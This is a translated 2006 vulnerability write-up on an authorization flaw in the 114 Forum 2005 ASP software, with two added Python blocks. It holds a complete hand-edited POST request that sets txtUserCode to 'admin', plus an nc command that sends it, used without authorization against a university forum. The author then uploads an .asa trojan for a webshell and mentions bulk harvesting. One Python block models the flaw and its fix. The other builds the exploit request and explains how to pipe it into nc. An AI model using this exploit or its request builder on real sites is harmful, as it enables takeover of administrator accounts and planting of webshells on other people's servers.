114 Forum 2005 official version vulnerability - vulnerability warning - the black bar safety net

2006-03-03T00:00:00
ID MYHACK58:6220067582
Type myhack58
Reporter Anonymous (佚名)
Modified 2006-03-03T00:00:00

Description

Article author: withered Ling rose. Information source: Evil Octal Information Security Team (www.eviloctal.com)

Keywords (footer string for finding affected sites): "ALL RIGHTS RESERVED design and production: Web 114"

Vulnerability description: In the official release of 114 Forum 2005, /edituserdb.asp (and SaveUser_Account.asp, the page it posts to) does not validate the submitted form data against the session cookie. The account to be updated is taken from the form, so any registered user can change the administrator's password. The default backend is admin/index.asp.
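The flaw above is a missing ownership check: the handler trusts the client-supplied txtUserCode instead of the account bound to the session. The following Python model is an added example and is not code from 114 Forum or from the article; the real handler is Classic ASP and its source is not on this page, so the logic is an assumption, while the field names txtUserCode, txtPassword and txtConfirmPassword are those seen in the captured request. The field txtOldPassword in the hardened version is hypothetical.

```python
# Added example (not 114 Forum code): model of the flawed handler and a fix.
# Handler logic is assumed; field names come from the captured request.
from dataclasses import dataclass, field


@dataclass
class Session:
    """Server-side session state as it exists after a normal login."""
    user_code: str  # the account that actually authenticated


@dataclass
class UserDb:
    """Stand-in for the forum's user table: username -> password."""
    passwords: dict = field(default_factory=dict)


def save_user_account_vulnerable(session, form, db):
    """Models the behaviour the article exploits: the session is only checked
    for existence, and the account to update is read from txtUserCode,
    which the client controls."""
    if session is None:
        return "not logged in"
    if form["txtPassword"] != form["txtConfirmPassword"]:
        return "passwords do not match"
    target = form["txtUserCode"]  # attacker sets this to "admin"
    db.passwords[target] = form["txtPassword"]
    return "member information modified successfully"


def save_user_account_fixed(session, form, db):
    """Hardened version: the target account is the one bound to the session,
    a txtUserCode naming any other account is rejected, and a password change
    requires the current password (hypothetical field txtOldPassword)."""
    if session is None:
        return "not logged in"
    target = session.user_code
    if form.get("txtUserCode", target) != target:
        return "forbidden: txtUserCode does not match the logged-in user"
    if form.get("txtOldPassword") != db.passwords.get(target):
        return "forbidden: current password required"
    if form["txtPassword"] != form["txtConfirmPassword"]:
        return "passwords do not match"
    db.passwords[target] = form["txtPassword"]
    return "member information modified successfully"


def replay_attack(handler):
    """Log in as the low-privilege user 33221, then submit the edit form with
    txtUserCode=admin as the article does. Returns (message, admin password)."""
    db = UserDb({"admin": "original-admin-secret", "33221": "33221"})
    session = Session(user_code="33221")  # what the ASPSESSIONID maps to
    form = {
        "txtUserCode": "admin",
        "txtPassword": "33221",
        "txtConfirmPassword": "33221",
        "txtOldPassword": "33221",  # attacker knows only their own password
    }
    msg = handler(session, form, db)
    return msg, db.passwords["admin"]


if __name__ == "__main__":
    print("vulnerable:", replay_attack(save_user_account_vulnerable))
    print("fixed:     ", replay_attack(save_user_account_fixed))
```

The fix is not the password-confirmation check (the vulnerable handler already has that); it is deriving the target account from server-side session state and refusing any form value that disagrees with it.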

Today, while I was at it, I poked a bit at a machine in one of the server rooms: <http://www.***.net.cn/xzl/BBS/index.asp>

It is a forum on a medical university website. Register a user, 33221. Then go to /edituserdb.asp, click "Modify registration" and start capturing the request. Saved with Notepad, the capture looks like this:
-----------------------------------------------------------------------------------------------------------

POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.***.net.cn/xzl/BBS//edituserdb.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.***.net.cn
Content-Length: 2304
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserName"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="selSex"

Mr.
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtNick"

11
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtProvince"

111
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAddress"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPostCode"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTel"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtMobile"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtFax"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtEmail"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUrl"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtfile"; filename=""
Content-Type: application/octet-stream


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtOicq"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtDocument"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="submit"

Modify the registration information
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtId"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTempId"


-----------------------------7d61e41d605f6--

------------------------------------------------------------------------------------------------------------

The part that matters is the first few fields:

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"

33221
-----------------------------7d61e41d605f6

Change the first "33221" (the txtUserCode value) to "admin" and save the result as 11.txt:

POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.***.net.cn/xzl/BBS//edituserdb.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.***.net.cn
Content-Length: 2304
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"

admin
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserName"

33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="selSex"

Mr.
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtNick"

11
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtProvince"

111
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAddress"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPostCode"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTel"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtMobile"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtFax"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtEmail"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUrl"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtfile"; filename=""
Content-Type: application/octet-stream


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtOicq"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtDocument"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="submit"

Modify the registration information
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtId"


-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTempId"


-----------------------------7d61e41d605f6--

Because the username I registered, 33221, is the same length as admin (five bytes), the Content-Length does not need to be changed here. Then submit the file to the server with nc:

nc www.***.net.cn 80 < 11.txt

The server returns a prompt saying the member information was modified successfully. Now log in as admin with the password 33221, which of course gives administrator privileges. Go into the backend, click "Modify column", upload an .asa trojan, and there is the webshell.

From what I saw, this forum system has no patch, so webshells could be harvested in bulk, but I only wanted the one server that was useful to me and did not go after the others. If anything is unclear, watch the animation: <http://www.ncph.net/soft/114论坛最新漏洞利用动画.rar>. A garbage vulnerability, posted for beginners to look at; experts, please don't flame me.
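The one thing that bites when replaying a hand-edited capture through nc is the Content-Length header: the author got away with leaving it at 2304 only because "admin" and "33221" are the same length. The script below is an added example, not part of the original article, that rebuilds the captured multipart body from a field list, recomputes Content-Length from the real body size, and checks a saved request file before it is piped into nc. The boundary, path, cookie name and field names are taken from the capture; the host, cookie value and field values are constructed placeholders (the submit and selSex values in the real capture were Chinese text, so the byte count here will not equal 2304), and Connection: close is substituted for Keep-Alive so the server closes the socket and nc exits.

```python
# Added example (not from the original article): rebuild the captured request
# with a Content-Length computed from the body, and verify a saved file.
BOUNDARY = "---------------------------7d61e41d605f6"   # from the capture
PATH = "/xzl/BBS//SaveUser_Account.asp"                  # from the capture

# (name, value) pairs in the order the browser sent them. txtfile is the empty
# file-upload control and gets a filename and Content-Type line of its own.
# Values are constructed; the real capture carried Chinese text in two of them.
CAPTURED_FIELDS = [
    ("txtUserCode", "33221"), ("txtPassword", "33221"),
    ("txtConfirmPassword", "33221"), ("txtQuestion", "33221"),
    ("txtAnswer", "33221"), ("txtUserName", "33221"), ("selSex", "Mr."),
    ("txtNick", "11"), ("txtProvince", "111"), ("txtAddress", ""),
    ("txtPostCode", ""), ("txtTel", ""), ("txtMobile", ""), ("txtFax", ""),
    ("txtEmail", ""), ("txtUrl", ""), ("txtfile", b""), ("txtOicq", ""),
    ("txtDocument", ""), ("submit", "Modify the registration information"),
    ("txtId", ""), ("txtTempId", ""),
]


def multipart_body(fields, boundary=BOUNDARY):
    """Serialise fields as multipart/form-data with CRLF line endings; a bytes
    value is treated as a file control (empty filename, octet-stream)."""
    out = bytearray()
    for name, value in fields:
        out += f"--{boundary}\r\n".encode()
        if isinstance(value, bytes):
            out += (f'Content-Disposition: form-data; name="{name}"; filename=""\r\n'
                    "Content-Type: application/octet-stream\r\n\r\n").encode()
            out += value + b"\r\n"
        else:
            out += (f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
                    f"{value}\r\n").encode("utf-8")
    out += f"--{boundary}--\r\n".encode()
    return bytes(out)


def with_user_code(fields, user_code):
    """Copy of fields with txtUserCode replaced: the edit the article makes."""
    return [(n, user_code if n == "txtUserCode" else v) for n, v in fields]


def build_request(host, fields, session_id, path=PATH, boundary=BOUNDARY):
    """Complete HTTP/1.1 request bytes. Content-Length is derived from the
    body, so a username of any length stays consistent with the header."""
    body = multipart_body(fields, boundary)
    headers = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        f"Content-Type: multipart/form-data; boundary={boundary}",
        f"Content-Length: {len(body)}",
        f"Cookie: ASPSESSIONIDSCTSQSAB={session_id}",
        "Connection: close",   # Keep-Alive would leave nc hanging
    ]
    return "\r\n".join(headers).encode() + b"\r\n\r\n" + body


def content_length_matches(raw):
    """Pre-flight check for a saved request such as 11.txt: True only when the
    Content-Length header equals the byte length of the body after the blank
    line. A stale value makes the server truncate the form or wait forever."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return False
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            return int(line.split(b":", 1)[1].strip()) == len(body)
    return False


if __name__ == "__main__":
    sid = "EKMKINHAIAACMGFMKABJDBME"            # placeholder session id
    original = build_request("www.example.net", CAPTURED_FIELDS, sid)
    exploit = build_request("www.example.net",
                            with_user_code(CAPTURED_FIELDS, "admin"), sid)
    print(len(original), len(exploit), content_length_matches(exploit))
```

Write the bytes returned by build_request to 11.txt with open(..., "wb") (Notepad would add a trailing newline and may convert line endings) and pipe that into nc as the article does. The same check is what to run whenever the substituted username is not exactly five bytes long.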